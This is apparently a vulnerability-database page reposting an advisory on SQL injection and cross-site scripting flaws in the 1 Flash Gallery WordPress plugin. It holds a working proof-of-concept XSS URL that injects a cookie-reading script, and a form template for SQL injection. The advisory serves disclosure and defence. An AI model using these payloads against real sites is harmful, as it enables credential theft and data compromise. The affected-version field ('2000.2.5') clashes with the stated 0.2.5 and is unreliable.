1 Flash Gallery SQL Injection and Cross-Site Scripting Vulnerabilities

vendor:

1 Flash Gallery

by:

Unknown

7.5

CVSS

HIGH

SQL Injection, Cross-Site Scripting

CWE

Product Name: 1 Flash Gallery

Affected Version From: 2000.2.5

Affected Version To: Unknown

Patch Exists: No

Related CWE: Not specified

CPE: a:1_flash_gallery:1_flash_gallery:0.2.5

Metasploit:

Other Scripts:

Platforms Tested: Not specified

Unknown

1 Flash Gallery SQL Injection and Cross-Site Scripting Vulnerabilities

The vulnerabilities in 1 Flash Gallery allow an attacker to execute SQL commands and inject malicious scripts. These exploits can lead to the theft of authentication credentials, data compromise, application compromise, and exploitation of underlying database vulnerabilities.

Mitigation:

Apply security patches or updates provided by the vendor. Input validation and sanitization should be implemented to prevent SQL injection and cross-site scripting attacks.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/46783/info

1 Flash Gallery is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

1 Flash Gallery 0.2.5 is vulnerable; other versions may also be affected.

http://www.example.com/wp-content/plugins/1-flash-gallery/folder.php?type=%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

<form action="http://[host]/wp-content/plugins/1-flash-gallery/massedit_album.php" method="post" name="main" >
<input type="hidden" name="album_id" value="1" />
<input type="hidden" name="images" value="1" />
<input type="hidden" name="gall_id" value="SQL_CODE_HERE" />
<input type="submit" value="submit" name="submit" />